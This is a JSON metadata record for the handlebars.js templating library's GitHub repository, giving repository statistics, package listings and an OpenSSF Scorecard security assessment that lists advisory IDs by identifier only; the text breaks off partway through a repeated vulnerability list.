{"id":377992,"url":"https://github.com/handlebars-lang/handlebars.js","last_synced_at":"2026-07-22T14:01:33.837Z","repository":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2026-06-24T23:40:45.000Z","size":4613,"stargazers_count":18652,"open_issues_count":110,"forks_count":2065,"subscribers_count":432,"default_branch":"master","last_synced_at":"2026-07-18T08:04:33.114Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2026-07-17T19:48:10.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"57b49b24-4bc7-4df8-b069-e31179883809","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: GHSA-xvch-5gv4-984h","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-28xh-wpgr-7fm8","Warn: Project is vulnerable to: GHSA-9wv6-86v2-598j","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-hrpp-h998-j3pp","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-x3m3-4wpv-5vgc","Warn: Project is vulnerable to: GHSA-c2qf-rxjj-qqgw","Warn: Project is vulnerable to: GHSA-m6fv-jmcg-4jfg","Warn: Project is vulnerable to: GHSA-cm22-4g7w-348p","Warn: Project is vulnerable to: GHSA-3jfq-g458-7qm9","Warn: Project is vulnerable to: GHSA-5955-9wpr-37jh","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-r628-mhmh-qjhw","Warn: Project is vulnerable to: GHSA-9r2w-394v-53qc","Warn: Project is vulnerable to: GHSA-qq89-hq3f-393p","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-7p7h-4mm5-852v","Warn: Project is vulnerable to: GHSA-wr3j-pwj9-hqq6","Warn: Project is vulnerable to: GHSA-cf66-xwfp-gvc4","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h","Warn: Project is vulnerable to: GHSA-j8xg-fqg3-53r7","Warn: Project is vulnerable to: GHSA-3h5v-q93c-6h6q","Warn: Project is vulnerable to: GHSA-776f-qx25-q3cc"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-19T09:08:48.273Z","repository_id":998342,"created_at":"2025-08-19T09:08:48.274Z","updated_at":"2025-08-19T09:08:48.274Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":35619777,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-05-26T15:22:16.424Z","status":"online","status_checked_at":"2026-07-18T02:00:07.223Z","response_time":61,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"handlebars-lang","name":"The Handlebars Templating Language","uuid":"19378685","kind":"organization","description":"","email":null,"website":"https://handlebarsjs.com/","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/19378685?v=4","repositories_count":8,"last_synced_at":"2024-04-28T02:35:24.096Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/handlebars-lang","funding_links":[],"total_stars":17814,"followers":61,"following":0,"created_at":"2022-11-02T16:37:33.313Z","updated_at":"2024-04-28T02:35:25.495Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang/repositories"},"packages":[{"id":14153701,"name":"org.mvnpm:handlebars","ecosystem":"maven","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":[],"namespace":"org.mvnpm","versions_count":2,"first_release_published_at":"2025-03-19T04:44:59.000Z","latest_release_published_at":"2026-03-30T16:38:15.000Z","latest_release_number":"4.7.9","last_synced_at":"2026-07-19T22:22:17.428Z","created_at":"2026-03-30T16:47:47.326Z","updated_at":"2026-07-19T22:22:17.428Z","registry_url":"https://central.sonatype.com/artifact/org.mvnpm/handlebars/","install_command":null,"documentation_url":"https://appdoc.app/artifact/org.mvnpm/handlebars/","metadata":{},"repo_metadata":{},"repo_metadata_updated_at":"2026-03-30T16:47:48.850Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":29.625992842803527,"dependent_packages_count":42.353462484851946,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":35.989727663827736},"purl":"pkg:maven/org.mvnpm/handlebars","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm:handlebars","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm:handlebars","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm:handlebars/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm:handlebars/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://repo.maven.apache.org/maven2","ecosystem":"maven","default":true,"packages_count":612498,"maintainers_count":0,"namespaces_count":80807,"keywords_count":34879,"github":"maven-central","metadata":{"funded_packages_count":37828},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-06-10T05:05:55.821Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":7998602,"name":"handlebars-jaylinski-test","ecosystem":"npm","description":"Handlebars provides the power necessary to let you build semantic templates effectively with no frustration","homepage":"https://www.handlebarsjs.com/","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/handlebars-lang/handlebars.js","keywords_array":["handlebars","mustache","template","html"],"namespace":null,"versions_count":2,"first_release_published_at":"2023-07-27T21:22:44.506Z","latest_release_published_at":"2023-07-27T21:23:48.605Z","latest_release_number":"4.7.8","last_synced_at":"2026-07-19T22:22:13.160Z","created_at":"2023-07-27T21:25:06.724Z","updated_at":"2026-07-19T22:22:13.161Z","registry_url":"https://www.npmjs.com/package/handlebars-jaylinski-test","install_command":"npm install handlebars-jaylinski-test","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"4.7.8"}},"repo_metadata":{"id":998342,"uuid":"809601","full_name":"handlebars-lang/handlebars.js","owner":"handlebars-lang","description":"Minimal templating on steroids.","archived":false,"fork":false,"pushed_at":"2025-08-19T20:53:19.000Z","size":4055,"stargazers_count":18474,"open_issues_count":111,"forks_count":2056,"subscribers_count":436,"default_branch":"master","last_synced_at":"2025-10-26T13:58:41.392Z","etag":null,"topics":["handlebars","mustache","templates"],"latest_commit_sha":null,"homepage":"http://handlebarsjs.com","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":"linkedin/Burrow","license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/handlebars-lang.png","metadata":{"files":{"readme":"README.markdown","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2010-07-31T18:54:46.000Z","updated_at":"2025-10-25T20:27:46.000Z","dependencies_parsed_at":"2023-09-22T06:08:40.588Z","dependency_job_id":"704e5df2-5b6b-4f79-8e30-c8540825a30e","html_url":"https://github.com/handlebars-lang/handlebars.js","commit_stats":{"total_commits":1718,"total_committers":206,"mean_commits":8.339805825242719,"dds":0.519208381839348,"last_synced_commit":"f422bfdf3ed321c32c6eecfaa778de46275fb76d"},"previous_names":["wycats/handlebars.js"],"tags_count":89,"template":false,"template_full_name":null,"purl":"pkg:github/handlebars-lang/handlebars.js","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/handlebars-lang","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/sbom","scorecard":{"id":454219,"data":{"date":"2025-08-11","repo":{"name":"github.com/handlebars-lang/handlebars.js","commit":"cc8574e63121861c1c89ef495f9be89ef7dd2413"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4,"checks":[{"name":"Code-Review","score":3,"reason":"Found 9/24 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/release.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":2,"reason":"dependency not pinned by hash detected -- score normalized to 2","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:71: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/release.yml:23: update your workflow using https://app.stepsecurity.io/secureworkflow/handlebars-lang/handlebars.js/release.yml/master?enable=pin","Warn: npmCommand not pinned by hash: tests/integration/rollup-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-babel-test/test.sh:7","Warn: npmCommand not pinned by hash: tests/integration/webpack-test/test.sh:7","Info:   0 out of   8 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   7 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 26 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"59 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-67hx-6x53-jw92","Warn: Project is vulnerable to: GHSA-qwcr-r2fm-qrc7","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-cwfw-4gq5-mrqx","Warn: Project is vulnerable to: GHSA-g95f-p29q-9xw4","Warn: Project is vulnerable to: GHSA-grv7-fg5c-xmjg","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-w573-4hg7-7wgq","Warn: Project is vulnerable to: GHSA-c6rp-wrp9-qr4q","Warn: Project is vulnerable to: GHSA-rv95-896h-c2vc","Warn: Project is vulnerable to: GHSA-qw6h-vgh9-j6wx","Warn: Project is vulnerable to: GHSA-jchw-25xp-jwwc","Warn: Project is vulnerable to: GHSA-cxjh-pqwp-8mfp","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4q6p-r6v2-jvc5","Warn: Project is vulnerable to: GHSA-c7qv-q95q-8v27","Warn: Project is vulnerable to: GHSA-qqgx-2p2h-9c37","Warn: Project is vulnerable to: GHSA-9c47-m6qq-7p4h","Warn: Project is vulnerable to: GHSA-76p3-8jx3-jpfq","Warn: Project is vulnerable to: GHSA-jf85-cpcp-j695","Warn: Project is vulnerable to: GHSA-fvqr-27wr-82fm","Warn: Project is vulnerable to: GHSA-4xc9-xhrj-v574","Warn: Project is vulnerable to: GHSA-x5rq-j2xg-h7qm","Warn: Project is vulnerable to: GHSA-p6mc-m468-83gw","Warn: Project is vulnerable to: GHSA-29mw-wpgm-hmr9","Warn: Project is vulnerable to: GHSA-35jh-r3h4-6jhm","Warn: Project is vulnerable to: GHSA-952p-6rrq-rcjv","Warn: Project is vulnerable to: GHSA-hxm2-r34f-qmc5","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-vh95-rmgr-6w4m","Warn: Project is vulnerable to: 